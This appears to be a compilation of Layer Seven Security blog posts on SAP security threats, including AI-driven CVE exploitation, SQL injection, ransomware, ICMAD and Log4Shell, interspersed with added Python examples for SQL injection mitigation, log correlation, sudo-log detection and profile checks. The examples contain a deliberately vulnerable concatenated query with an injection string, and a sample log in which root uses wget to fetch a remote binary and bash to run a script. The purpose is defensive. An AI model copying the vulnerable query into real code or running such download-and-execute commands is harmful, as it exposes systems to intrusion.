Layer Seven Security

Artificial Intelligence Exploits Vulnerabilities in Systems with an 87 percent Success Rate

Based on a newly-released paper published by researchers at the University of Illinois, AI agents can combine large language models with automation software to autonomously analyze and exploit security vulnerabilities. During the research, OpenAI’s GPT-4 large language model was able to successfully exploit 87 percent of vulnerabilities when provided with a CVE advisory describing the flaws. The dataset included 15 one-day vulnerabilities taken from the Common Vulnerabilities and Exposures (CVE) database. One-day vulnerabilities are vulnerabilities that have been disclosed but not patched. More than 50 percent of the dataset were critical or high-rated vulnerabilities.  Vulnerability exploitation was performed by GPT-4 using the ReAct automation framework.

Large language models are AI programs that use deep learning to recognize and interpret complex data such as human language. GPT-4 failed to exploit just two of the 15 vulnerabilities in the dataset. This included CVE-2023-51653 for Hertzbeat RCE. The failure to exploit this particular CVE was due to differences between the language available for the detailed description of the vulnerability and the language deployed for the AI agent.

Researchers calculated the cost of successful AI agent attacks at just $8.80 per exploit. The agent consists of only 91 lines of code and has not been publicly released at the request of OpenAI.

The ground-breaking research demonstrates the risk posed by the use of AI to automate the discovery and exploitation of security vulnerabilities. It reduces the complexity and cost of vulnerability exploitation and increases the reach of threat actors.

The details of SAP vulnerabilities are publicly available in sources such as the CVE database and the NIST National Vulnerability Database (NVD).  AI agents using large language models can analyze CVEs in the databases including details revealed in links for each CVE. SAP vulnerabilities are also documented and explained in depth in security forums. This often includes disclosure of sample code for vulnerability exploitation.

According to another recent study performed by Flashpoint and Onapsis, ransomware incidents impacting SAP systems increased by 400% over the last three years. Conversations on SAP vulnerabilities and exploits increased by 490% across the open, deep, and dark web between 2021 and 2023.

SAP customers can actively manage the risk of the successful discovery and exploitation of vulnerabilities including attacks leveraging artificial intelligence by regularly patching SAP solutions and through on-going vulnerability management. The Cybersecurity Extension for SAP automates the detection of both required SAP security notes and vulnerabilities in SAP solutions and infrastructure. It also detects vulnerabilities in custom SAP applications and programs.

FBI and CISA Issue Alert for Threat Actors Actively Exploiting SQL Injection Vulnerabilities

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert this week to urge organizations to urgently address SQL injection vulnerabilities in software. The alert is based on recent exploits performed by the CL0P cybercrime group, also known as TA505. The Russian group has exploited SQL injection vulnerabilities to propagate ransomware that has extorted an estimated $100M from organizations.

TA505 provides Ransomware-as-a-Service (RaaS) to other threat actors, sells access to compromised corporate networks as an initial access broker, and operates botnets specializing in financial fraud. The group is actively exploiting SQL injection vulnerabilities to install web shells in compromised servers. The web shells are used to execute operating system commands, install malicious ransomware programs, and exfiltrate data. TA505 is believed to have breached 130 organizations in just 10 days.

SQL injection vulnerabilities arise when user inputs are included in SQL commands to execute database queries. The processing of database queries containing malicious commands can enable threat actors to access and modify sensitive data, change programs and system configurations, and install and execute programs such as ransomware.  

The risk of SQL injection can be mitigated using a combination of input validation and output encoding, escaping and quoting. Input validation reviews user-provided data before it is included in database queries and rejects data that does not conform with expected specifications such as character types, length, and syntax. Output encoding, escaping, and quoting can be more effective than input validation since programs often need to support free-form text containing arbitrary characters.
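The vulnerable pattern and the two mitigations described above, side by side, as an added example that is not from the original article. It uses Python with an in-memory SQLite database and constructed data; the table, the customer id format and the function names are assumptions.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id TEXT PRIMARY KEY, name TEXT, city TEXT)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?, ?)",
        [("C001", "Acme", "Toronto"),
         ("C002", "O'Brien Ltd", "Dublin"),
         ("C003", "Globex", "Berlin")],
    )
    return db


def find_by_city_vulnerable(db, city):
    # Vulnerable: user input is concatenated into the statement, so a quote
    # character in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT id FROM customers WHERE city = '" + city + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


ID_FORMAT = re.compile(r"C[0-9]{3}")  # hypothetical format for customer ids


def validate_customer_id(value):
    # Input validation: reject anything that is not exactly the expected format.
    if not isinstance(value, str) or not ID_FORMAT.fullmatch(value):
        raise ValueError("customer id does not match the expected format")
    return value


def quote_literal(value):
    # Escaping and quoting for free-form text: double every single quote and
    # wrap the result in quotes so the input stays inside one string literal.
    # This is the SQL-standard rule that SQLite follows; other databases may
    # need additional escaping.
    if "\x00" in value:
        raise ValueError("NUL byte in input")
    return "'" + value.replace("'", "''") + "'"


def find_by_id(db, customer_id):
    # The id is only placed in the statement after it has passed validation.
    sql = "SELECT name FROM customers WHERE id = '" + validate_customer_id(customer_id) + "'"
    return [row[0] for row in db.execute(sql)]


def find_by_name(db, name):
    # Names are free-form text, so they are quoted rather than pattern-checked.
    sql = "SELECT id FROM customers WHERE name = " + quote_literal(name) + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]


HOSTILE = "x' OR '1'='1"  # constructed input containing quote characters

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", find_by_city_vulnerable(db, "Dublin"))
    print("vulnerable, hostile input:", find_by_city_vulnerable(db, HOSTILE))
    print("quoted, name with quote  :", find_by_name(db, "O'Brien Ltd"))
    print("quoted, hostile input    :", find_by_name(db, HOSTILE))
```

The quoted lookup still finds the legitimate name that contains an apostrophe, which a strict character allow-list would have rejected.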

SAP software is subjected to static code analysis and other forms of security testing to detect and remove potential SQL injection vulnerabilities. However, SAP is not responsible for securing custom programs and applications deployed to SAP systems. Securing custom programs is the responsibility of each SAP customer. The Cybersecurity Extension for SAP is an SAP-certified addon that automatically detects SQL injection vulnerabilities in custom SAP ABAP programs and SAP UI5 applications. This includes SQL injection vulnerabilities in SELECT, INSERT, UPDATE, MODIFY, DELETE and other statements, as well as GROUP, JOIN, SET, WHERE, and other conditions and clauses. It also detects SQL injection issues in ADBC, DDL, DML and other statements executed by APIs in SAP systems.

The Cybersecurity Extension for SAP integrates with the ABAP Test Cockpit (ATC) and SAP Code Inspector (SCI). It also integrates with the Transport Management System (TMS) to automatically scan and block requests containing SQL injection and other security vulnerabilities.

Layer Seven Security Releases Updated Ransomware Guide for SAP

Earlier this month, MGM Resorts reported a major cyber attack that severely disrupted its operations including online and payment processing systems. Threat actors are reported to have breached MGM’s network and systems and exfiltrated several terabytes of sensitive data. The company was forced to shut down several key systems as it worked with law enforcement agencies and cybersecurity companies to investigate and contain the breach.

MGM reported the incident in form 8-K filings required by the Securities and Exchange Commission (SEC). New SEC rules effective from September 5 require publicly listed organizations in the U.S. to disclose material cybersecurity incidents within four business days.

The hacking group Scattered Spider, part of the ALPHV cyber criminal organization, has claimed responsibility for the breach. Scattered Spider is believed to have breached around 100 organizations within the last two years, mostly in the U.S. and Canada. According to statements released by ALPHV, also known as BlackCat, the group was able to breach MGM by exploiting vulnerabilities in an access and identity management provider and cloud tenant. Once they gained administrative access to more than 100 ESXi hypervisors at MGM, ALPHV began deploying ransomware in the compromised systems. Ransomware is a form of malware that encrypts the file system to lock targets until a ransom is paid by the victim.

Caesars Entertainment also reported in September that it had been the victim of a successful ransomware attack that breached personally-identifiable information in its loyalty program database including driver’s license and social security numbers. Caesars disclosed in its 8-K filing with the SEC that the organization paid a $15 million ransom to prevent the disclosure of the stolen data and restore access to its compromised systems.

The business impact of ransomware can be significant in terms of both direct and indirect costs and reputational harm. For example, according to the credit rating agency Moody’s, the cyberattack at MGM could negatively impact the credit rating of the company.

SAP systems are not immune to ransomware. They can be compromised through vulnerable operating systems supporting SAP solutions, insecure protocols, interfaces and cross-system interfaces, and OS commands performed through the application layer that exploit trust relationships between SAP applications and hosts. In response to the recent breaches at Caesars and MGM, Layer Seven Security has released an updated guide for securing SAP solutions from ransomware. Layer Seven Security is an industry-leader in cybersecurity services and solutions for SAP. The guide provides clear and succinct recommendations to prevent and detect ransomware attacks in SAP systems, as well as restore systems during the recovery phase. You can download the guide directly from SAPinsider by following this link.

How to Discover Actively Exploited Vulnerabilities in Your SAP Systems

SAP systems have a wide attack surface. Threat actors can enumerate and exploit multiple known vulnerabilities in SAP components and programs to compromise SAP solutions. Automated vulnerability scans often reveal hundreds of weaknesses in SAP systems. Remediating each vulnerability requires extensive planning and testing for each impacted system.  Most organizations do not have the resources to remediate every vulnerability to close all possible attack vectors in their SAP solutions. A prioritized approach focused on remediating high-risk vulnerabilities can be used to concentrate efforts. Organizations can also focus on vulnerabilities that are being actively exploited in their SAP systems. This involves correlating user and system activity captured in SAP logs with vulnerabilities that have been identified in systems.

This correlation is performed automatically by the Cybersecurity Extension for SAP (CES). CES is an addon for SAP Solution Manager and SAP Focused Run. CES will also be available as an extension for SAP Cloud ALM in 2024.

CES performs daily automated scans to detect over 4000 vulnerabilities in SAP applications and supporting databases and operating systems. The vulnerabilities are analyzed and managed using the Vulnerability Management application in CES. The application displays a summary of vulnerability scan results when accessed. Users can switch between the system card view and the dashboard view in the summary.

System Card View:

Dashboard View:

Users can select one or more systems from the Summary to drill down to the findings.

The Overview section displays the open vulnerabilities for the selected systems. Results can be filtered and sorted by area, environment, rating and other variables.

Responsibility for remediating vulnerabilities can be assigned to specific owners and assignees directly in the Overview. Target dates can also be maintained for the removal of the root causes of issues. Remediation plans can be maintained in the Action Plan tab in the detailed display for each vulnerability.

Actively exploited vulnerabilities are identified and flagged based on automated and continuous correlation with event logs and alerts in CES. Results can be filtered to focus on vulnerabilities that have active alerts. Users can also create and publish alarms to their Launchpads for actively exploited vulnerabilities using the Save as Tile option.

In the example below, there is an open alert for the successful call of a vulnerable ICF service in a system. Although the vulnerability is rated as medium-risk, the active exploitation of the vulnerability in the system indicates that the finding should be prioritized for remediation.

The alert for the vulnerability can be analyzed by clicking on the alert icon for the vulnerability. This directs to the details of the alert in the Security Alerts application in CES.

The automated discovery and reporting of actively exploited vulnerabilities is supported in version 5.0 and higher of the Cybersecurity Extension for SAP.
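The correlation described above reduced to its core, as an added example that is not code from the Cybersecurity Extension for SAP: scan findings are matched against successful calls in an access log, and matched findings are ranked ahead of unmatched ones regardless of rating. The finding layout, the log layout and all sample values are constructed for illustration.

```python
from dataclasses import dataclass

RATING_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass(frozen=True)
class Finding:
    system: str    # system ID
    check: str     # what the scan reported
    rating: str    # critical / high / medium / low
    service: str   # ICF service path the finding relates to, "" if none


# Constructed scan results (hypothetical layout, not the CES data model).
FINDINGS = [
    Finding("PRD", "Kernel patch level below minimum", "high", ""),
    Finding("PRD", "ICF service SOAP RFC is active", "medium", "/sap/bc/soap/rfc"),
    Finding("QAS", "ICF service WEB RFC is active", "medium", "/sap/bc/webrfc"),
]

# Constructed access log: timestamp, system, client, method, target, status.
ACCESS_LOG = """\
2024-03-01T10:15:02Z PRD 10.1.4.23 POST /sap/bc/soap/rfc?sap-client=100 200
2024-03-01T10:15:09Z PRD 10.1.4.23 POST /sap/bc/soap/rfc 401
2024-03-01T10:16:40Z PRD 10.1.7.8 GET /sap/bc/ui5_ui5/app/index.html 200
2024-03-01T10:17:11Z QAS 10.1.4.23 GET /sap/bc/webrfc 403
malformed line
"""


def parse_access_log(text):
    """Turn log lines into event dicts, skipping lines that do not fit the layout."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or not parts[5].isdigit():
            continue
        ts, system, client, _method, target, status = parts
        # Compare on the path only: drop the query string and a trailing slash.
        path = target.split("?", 1)[0].rstrip("/").lower()
        events.append({"time": ts, "system": system, "client": client,
                       "path": path, "status": int(status)})
    return events


def is_successful_call(event, finding):
    """True when the event is a 2xx call to the finding's service on the same system."""
    if not finding.service or event["system"] != finding.system:
        return False
    if not 200 <= event["status"] < 300:
        return False  # rejected calls (401, 403, ...) are not successful use
    service = finding.service.lower()
    return event["path"] == service or event["path"].startswith(service + "/")


def prioritize(findings, events):
    """Return (finding, matching events), actively used findings first, then by rating."""
    ranked = [(f, [e for e in events if is_successful_call(e, f)]) for f in findings]
    ranked.sort(key=lambda item: (not item[1], RATING_ORDER[item[0].rating]))
    return ranked


if __name__ == "__main__":
    for finding, hits in prioritize(FINDINGS, parse_access_log(ACCESS_LOG)):
        flag = "ACTIVE" if hits else "      "
        print(flag, finding.system, finding.rating.ljust(8), finding.check, len(hits))
```

With the sample data the medium-rated ICF finding in PRD is listed first because one call to it succeeded, while the rejected calls in PRD and QAS do not raise their findings.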

Cybersecurity Threats to SAP Systems Report

Earlier this month, SAPinsider released the 2023 Cybersecurity Threats to SAP Systems Report. Co-sponsored by Layer Seven Security, the report is based on the findings of a survey of more than 205 security professionals in North America, EMEA, APJ, and LATAM, representing SAP customers across nine industries.

The report revealed several trends in 2023 compared to reports for earlier years. Similar to 2022, respondents ranked unpatched systems, ransomware attacks, and credentials compromise as the most significant threats to SAP systems. The exploitation of system interfaces and weak access controls were also identified as important but less significant threats.

Patching and updating SAP systems and enforcing secure password policies were reported as the most important requirements for SAP cybersecurity. Protecting SAP systems from zero-day threats was also identified as an important requirement, even though there is no evidence of the successful exploitation of any zero-day vulnerability for SAP solutions.

This article provides practical recommendations for managing the top five threats to SAP systems presented in the report. The recommendations can be implemented using a combination of the Cybersecurity Extension for SAP and SAP ALM platforms such as Solution Manager, Focused Run, and Cloud ALM. According to the report, 81% of customers are using one or more of these platforms. However, less than half of SAP customers are fully leveraging the capabilities of their ALM investments.

Security Patching

Keeping up with patches is the most significant cybersecurity challenge reported by SAP customers. This is due to reasons such as the volume of patches, difficulties with prioritizing notes and scheduling system downtimes, the reluctance to apply notes that could impact system availability, and issues validating whether patches are correctly implemented. The last is especially challenging for notes with manual corrections.

System Recommendations (SysRec) in SAP Solution Manager automates the discovery and implementation of security notes for SAP solutions. It calculates relevant notes based on the installed software components and versions in systems. Notes can be filtered by priority to focus on hot news and high priority patches. SysRec also identifies objects impacted by security notes and provides usage counts for the objects. This can be used to develop targeted test plans based on the known impact of security notes. Notes impacting unused objects can be implemented with minimal testing.

Automated corrections can be downloaded through SysRec and staged in systems for implementation. Once implemented successfully, the relevant notes are automatically removed from the SysRec results. The implementation status of notes with manual corrections can be maintained using the Status option. False positives in SysRec can occur if notes are released by SAP without software component information. The Cybersecurity Extension for SAP (CES) automatically discovers and removes the false positives to improve the quality and reliability of notes reported by SysRec.


Ransomware

Ransomware can target SAP applications through multiple attack vectors. Unauthorized external program starts through the gateway server should be restricted using the secinfo access control list. Authorizations for OS commands should be restricted. This includes authorizations for RSBDCOS0, SM49 and CG3Z which can be used to download, install and run ransomware tools. Custom ABAP, UI5, Java and SQLScript programs may be exploited to perform arbitrary OS commands. Vulnerable programs can be discovered using code vulnerability scanning solutions. Vulnerable ICF services such as SOAP RFC and WEB RFC should be disabled. The SAP Virus Scan Interface should be enabled to support the detection of malware in file uploads and the propagation of ransomware through file downloads.

Ransomware can also target hosts supporting SAP applications. Therefore, it is important to secure and monitor the operating system layer in SAP systems. Unnecessary ports and services should be closed. Root commands and sudo actions should be closely monitored, particularly wget and bash commands, and the creation and execution of OS files. The Cybersecurity Extension for SAP is the only security solution that protects against and detects ransomware across application, database and OS layers in SAP systems.
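Detection logic for the sudo monitoring recommended above, run over constructed syslog lines (an added example, not part of the original article or of the Cybersecurity Extension for SAP). The host names, users and addresses are made up; the line layout is the one sudo writes to syslog.

```python
import posixpath
import re
import shlex

WATCHED = {"wget", "bash"}  # the commands the text singles out

# sudo syslog entry: "<user> : [<note> ; ]TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"^(?P<when>\w{3}\s+\d+ [\d:]{8}) (?P<host>\S+) sudo(?:\[\d+\])?:\s+"
    r"(?P<user>\S+) : (?:(?P<note>[^;=]+?) ; )?"
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>.*?) ; USER=(?P<runas>\S+) ; "
    r"COMMAND=(?P<command>.+)$"
)

# Constructed sample log.
SAMPLE_LOG = """\
Mar  3 02:14:07 sapprd01 sudo:  prdadm : TTY=pts/1 ; PWD=/home/prdadm ; USER=root ; COMMAND=/usr/bin/wget -O /tmp/upd.bin http://192.0.2.10/upd.bin
Mar  3 02:14:31 sapprd01 sudo:  prdadm : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash /tmp/upd.sh
Mar  3 03:00:01 sapprd01 sudo:  backup : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/rsync -a /sapmnt /backup
Mar  3 03:20:55 sapprd01 sudo:  webadm : command not allowed ; TTY=pts/3 ; PWD=/home/webadm ; USER=root ; COMMAND=/usr/bin/wget http://192.0.2.10/a
Mar  3 03:21:10 sapprd01 sshd[2211]: Accepted publickey for prdadm from 10.1.4.23 port 50122 ssh2
"""


def parse_sudo_line(line):
    """Return a dict for a sudo log entry, or None for any other line."""
    match = SUDO_RE.match(line.strip())
    if not match:
        return None
    event = match.groupdict()
    try:
        argv = shlex.split(event["command"])
    except ValueError:
        argv = event["command"].split()  # unbalanced quotes: fall back to whitespace
    # Compare on the program name so /bin/bash and /usr/bin/bash both match.
    event["program"] = posixpath.basename(argv[0]) if argv else ""
    # A note such as "command not allowed" means sudo refused the request.
    event["allowed"] = event["note"] is None
    return event


def flag_events(log_text):
    """Return (time, user, program, outcome) for watched commands run as root."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if event and event["runas"] == "root" and event["program"] in WATCHED:
            outcome = "executed" if event["allowed"] else "denied"
            alerts.append((event["when"], event["user"], event["program"], outcome))
    return alerts


if __name__ == "__main__":
    for alert in flag_events(SAMPLE_LOG):
        print(*alert, sep=" | ")
```

Denied attempts are reported as well as executed commands, since a refused wget by an application account is itself worth a look.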

Credentials Compromise

Transport layer security using SNC and SSL for SAP protocols will protect encoded SAP passwords in client-server and server-server communications. Access to password hashes in SAP tables should be restricted and monitored. Downwards-compatible passwords should be disabled since this will prevent the storage of password hashes that use vulnerable algorithms. Strong password policies should be enforced using the relevant settings in systems including login parameters in ABAP systems. Session management should be enabled and logon tickets and cookies should be secured against misuse. Detection and alerting for SAP accounts that may have been compromised can be activated using Anomaly Detection in the Cybersecurity Extension for SAP. Anomaly Detection will detect unusual user actions such as logins from new terminals or IP addresses for each user and the execution of transactions and reports that are not typically accessed by users.

System Interfaces

Program starts, server registrations, and monitor commands should be restricted for the gateway server. The use of RFC destinations with stored credentials should be restricted. The authorizations for RFC users should be provisioned based on the principle of least privilege to minimize the impact if RFC accounts are compromised. RFC user accounts should be system or communication user types, not dialog or reference. Positive whitelists are recommended to prevent the misuse of RFC callbacks. Trusted RFC connections should be used only in the required scenarios and trust relationships should not be configured from lower to higher order environments.

Unified Connectivity (UCON) should be enabled and configured to protect external calls to sensitive remote-enabled function modules (RFMs). Requests blocked by UCON are logged in the Security Audit Log.

Interface and Connection Monitoring (ICMon) in SAP Solution Manager and Integration and Exception Monitoring in SAP Focused Run can be deployed to identify critical internal and external system interfaces. This includes RFC, HTTP, Cloud, IDoc, and Web Service connections. Alerts can be configured for the usage of system interfaces outside of normal scenarios. For example, customers can enable alerting for an RFC destination if it is used by a user not included in a permitted whitelist or if the destination is used to call RFMs that are not typically called by the destination. Similar alerting can be enabled for calls to applications, IDocs, cloud services and web services accessed using non-RFC protocols.

Access Controls

Access to administrative profiles, roles, authorizations and transactions should be restricted. This includes roles and permissions in SAP databases and hosts. The SAP_ALL profile should not be used in productive systems. Standard users should be locked and default passwords should be changed. Authorization checks should be enforced for all RFMs and system operations. Switchable authorization checks should be enabled wherever applicable to secure access to sensitive function modules. Conflicting functions should be assigned to separate users to enforce the segregation of duties. This includes user creation/ role maintenance, role maintenance/ role assignment, and transport creation/ transport release.

The Cybersecurity Extension for SAP can be used to discover users with administrative permissions or access to conflicting functions. It can also alert for the execution of sensitive programs, reports and transactions. Exclusions can be maintained for specific users or based on factors such as user group to support whitelisting and prevent false positives or alert flooding.

Securing Microsoft Platforms with the Cybersecurity Extension for SAP

SAP systems consist of multiple integrated technological layers. SAP solutions comprise the application layer. The application layer is supported by database and operating system layers. The layers are closely integrated to form a software ecosystem linked through several connections including trust relationships that bond the layers to form an SAP system. The layers are more tightly integrated in SAP HANA installations where application, database and OS functions can share physical resources.

Since SAP systems are comprised of multiple layers, security must be applied across all layers within a system. Threat actors can bypass secure SAP applications by targeting weaknesses at the database or OS level to compromise SAP systems. Ransomware, for example, can lead to a denial-of-service for SAP services by exploiting vulnerable operating systems. Application-level data protection mechanisms can be bypassed by exfiltrating data in SAP solutions directly from the database.

The need to secure databases and operating systems in SAP systems is more pressing when SAP applications are coupled with Microsoft platforms that are widely targeted by threat actors and suffer from a host of known vulnerabilities and exploits. The Cybersecurity Extension for SAP is the only security solution that secures all layers within SAP systems including databases and operating systems.

Together with over 2000 vulnerability checks for SAP solutions, the Cybersecurity Extension for SAP performs automated vulnerability scans for Microsoft SQL Server and Microsoft Server to detect more than 300 known security weaknesses in the platforms. This includes active vulnerable services that widen the attack surface for databases and hosts, authentication settings including password policies, file and table encryption, users with administrative privileges including system and user administration, the availability of standard users, logging and auditing, open ports and services, and host firewall settings.

The Cybersecurity Extension for SAP also monitors database and operating system logs to detect indicators of compromise in Microsoft platforms and trigger alerts and email/SMS notifications for security incidents. This includes system, role and user changes, direct access to user tables, changes to database schemas, user groups, scheduled tasks, stored procedures, passwords and firewall settings, failed logons including attempted remote logons, packets blocked by host firewalls, remote procedure calls, service activation, device and program installation, and changes to system auditing.

CISA, FBI Warn Organizations to Protect Against State-Sponsored Malware

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint statement to advise organizations to prepare for increased cyber activity in the wake of the Russian invasion of Ukraine. According to the advisory, there is a risk that Russian cyber attacks will spread to government and business networks in the US and other NATO countries as a result of the growing international support for Ukraine and anticipated retaliation for sanctions imposed on Russia.

Threat actors deployed destructive malware against organizations in Ukraine in the lead up to the invasion.  This included the wipers WhisperGate and HermeticWiper, designed to permanently corrupt data in infected hosts, rendering them unbootable.  Both strains of malware masquerade as ransomware but have no decryption or data-recovery capabilities.

In response, CISA and the FBI urge all organizations to adopt a heightened posture towards cybersecurity and protecting their critical assets. Specifically, organizations are advised to secure remote access to networks, patch software to address known vulnerabilities, limit the attack surface by disabling unnecessary ports and services, and monitor, detect and respond to potential intrusions.

During this time of heightened risk, organizations can license the Cybersecurity Extension for SAP from Layer Seven Security free of charge for up to three months. According to Ian Thomson, Chief Operating Officer at Layer7, “Layer Seven Security is committed to supporting organizations protect their crucial SAP assets during this critical period. Our flagship solution the Cybersecurity Extension for SAP will be provided to customers without charge to help them secure mission-critical SAP applications and infrastructure from advanced persistent threats”.   

The Cybersecurity Extension for SAP is an SAP-Certified addon for SAP Solution Manager. It implements leading-edge vulnerability management for SAP applications, databases, hosts and components, including application gateways such as the SAProuter and Web Dispatcher. It integrates with System Recommendations for detecting and managing the lifecycle of SAP security notes. The solution identifies vulnerabilities in custom ABAP code and monitors event logs in SAP systems to detect and alert for over 600 indicators of compromise. The solution also applies advanced anomaly detection powered by SAP HANA to detect unusual system and user behavior.

Contact Layer Seven Security using the link below to discuss licensing the Cybersecurity Extension for SAP free of charge to secure your SAP applications.

Security Advisory for Critical SAP ICMAD Vulnerabilities

International threat intelligence agencies including the U.S. Cybersecurity & Infrastructure Security Agency (CISA) and the Computer Emergency Response Team for the EU (CERT-EU) issued security advisories last week for critical vulnerabilities in the SAP Internet Communication Manager (ICM). The ICM supports inbound and outbound communication with SAP systems using the HTTP(S) protocol. It is a standard component of the NetWeaver Application Server ABAP and Java and the SAP Web Dispatcher.

The advisories relate to CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, labelled ICMAD (Internet Communication Manager Advanced Desync). The most critical is CVE-2022-22536: a memory corruption vulnerability that can be exploited through a single HTTP request to fully compromise SAP systems, remotely and without authentication. This impacts AS ABAP and the Web Dispatcher when they are accessed through an HTTP gateway. For AS ABAP, the gateway could be the Web Dispatcher. The vulnerability does not impact direct access to SAP application servers. CVE-2022-22532 impacts AS Java only. This vulnerability has a lower CVSS than CVE-2022-22536 due to a higher attack complexity, but ranks high in terms of impact to Confidentiality, Integrity, and Availability. CVE-2022-22533 is for a lower priority denial of service vulnerability in AS Java triggered by requests that exhaust Memory Pipes (MPI) used for communicating between the ICM and work processes in application servers.

There is evidence of active scanning for ICMAD. SAP systems exposed to the Internet are especially vulnerable. External-facing Web Dispatchers are equally vulnerable. Consequently, it is critical to apply the relevant security notes to patch SAP systems against ICMAD.

Note 3123396 patches AS ABAP and the Web Dispatcher for CVE-2022-22536. SAP Kernels and Web Dispatchers should be updated to the minimum patch levels detailed in the note. The workaround detailed in note 3137885 can be applied as a stop-gap measure if the patches cannot be implemented at short notice. For access through the Web Dispatcher, refer to 3137885 to ensure that Web Dispatcher installations meet the minimum patch level. To apply the workaround, the profile parameter wdisp/additional_conn_close should be set to TRUE. For more details, refer to note 3138881.

Note 3123427 patches AS Java for CVE-2022-22532 and CVE-2022-22533. The workaround recommended in the note can be applied using the parameter setting icm/handle_http_pipeline_requests=FALSE if support for HTTP pipeline requests is not required.
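A check for the two workaround settings named above, run against constructed profile text (an added example, not SAP or Layer Seven Security code). The profile contents and function names are assumptions; the parameter names and values are the ones given in the text, and a parameter that appears more than once with different values is reported rather than resolved.

```python
# Workaround parameters and required values as named in the text above.
WORKAROUNDS = {
    "abap": ("wdisp/additional_conn_close", "TRUE"),
    "webdispatcher": ("wdisp/additional_conn_close", "TRUE"),
    "java": ("icm/handle_http_pipeline_requests", "FALSE"),
}

# Constructed profiles covering the four outcomes.
WEBDISP_PROFILE = """\
# constructed Web Dispatcher profile
SAPSYSTEMNAME = WDP
icm/server_port_0 = PROT=HTTPS,PORT=44300
#wdisp/additional_conn_close = TRUE
"""
ABAP_PROFILE = """\
SAPSYSTEMNAME = PRD
wdisp/additional_conn_close = FALSE
wdisp/additional_conn_close = TRUE
"""
JAVA_PROFILE = """\
SAPSYSTEMNAME = JPR
icm/handle_http_pipeline_requests = TRUE
"""
JAVA_FIXED_PROFILE = """\
SAPSYSTEMNAME = JPR
icm/handle_http_pipeline_requests = FALSE
"""


def parse_profile(text):
    """Collect every value set for each parameter; lines starting with '#' are comments."""
    params = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        # Split on the first '=' only: values such as PROT=HTTPS contain '=' too.
        name, value = line.split("=", 1)
        params.setdefault(name.strip(), []).append(value.strip())
    return params


def check_workaround(profile_text, stack):
    """Report whether the workaround for the given stack is set in the profile."""
    name, wanted = WORKAROUNDS[stack]
    values = parse_profile(profile_text).get(name, [])
    if not values:
        status = "missing"        # absent or only present in a comment
    elif len(set(values)) > 1:
        status = "conflicting"    # set more than once with different values
    elif values[0] == wanted:
        status = "applied"
    else:
        status = "incorrect"
    return {"parameter": name, "status": status, "values": values}


if __name__ == "__main__":
    for label, text, stack in [("WDP", WEBDISP_PROFILE, "webdispatcher"),
                               ("PRD", ABAP_PROFILE, "abap"),
                               ("JPR", JAVA_PROFILE, "java"),
                               ("JPR fixed", JAVA_FIXED_PROFILE, "java")]:
        print(label, check_workaround(text, stack))
```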

The Cybersecurity Extension for SAP discovers vulnerable ABAP, Java and Web Dispatcher installations that have not been successfully patched for ICMAD. It also identifies missing or incorrectly applied workarounds if the corrections in notes 3123396 and 3123427 have not been applied. The SAP-certified solution performs over 1800 checks for known vulnerabilities in SAP applications and components and supporting databases and operating systems.

Whitepaper: Securing SAP Solutions from Log4Shell

Log4Shell is one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility. A dangerous zero-day remote code execution vulnerability in Log4J was reported in November last year. The vulnerability was patched in December and published in the National Vulnerability Database on December 12 as CVE-2021-44228.

Log4Shell was added to the Known Exploited Vulnerabilities (KEV) Catalog by the Cybersecurity and Infrastructure Security Agency (CISA) due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Iran, Russia and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is bundled in multiple SAP solutions including products such as SAP HANA and SAP Process Orchestration. Download the new whitepaper from Layer Seven Security to learn how to mitigate and detect Log4Shell in SAP applications. The whitepaper includes a detailed breakdown of the vulnerability, guidance for patching and securing SAP solutions, and recommendations for detecting Log4Shell signatures and indicators of compromise.


Securing SAP Systems from Log4J Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has designated the recent Log4J vulnerability as one of the most serious in decades and urged organizations to immediately address the vulnerability in applications.  

Log4j is an open-source logging framework maintained by the Apache Foundation. The framework supports the Java Naming and Directory Interface (JNDI) API. Strings passed through JNDI can force Log4J to query remote LDAP or other servers, download serialized Java code from the malicious servers, and execute the code during deserialization if message lookup substitution is enabled. This can lead to the complete compromise of impacted applications and systems. The remote code execution vulnerability impacts all versions of Log4J2 up to and including 2.14.1 in Java 8 or higher.

Message lookup substitution is disabled by default in Log4j 2.15.0. It has been removed altogether from 2.16.0. Therefore, customers should upgrade to the latest version of Log4J. The vulnerability is tracked as CVE-2021-44228, which has a base CVSS score of 10.0.

CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Russia, Iran, and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is included in multiple SAP applications including SAP HANA XSA. The central note 3131047 includes available patches for impacted solutions. Refer to SAP’s official response for details of all impacted products. Note 3129883 includes manual procedures for a workaround that will disable the loading of external code in Log4J using the J2EE Config Tool.
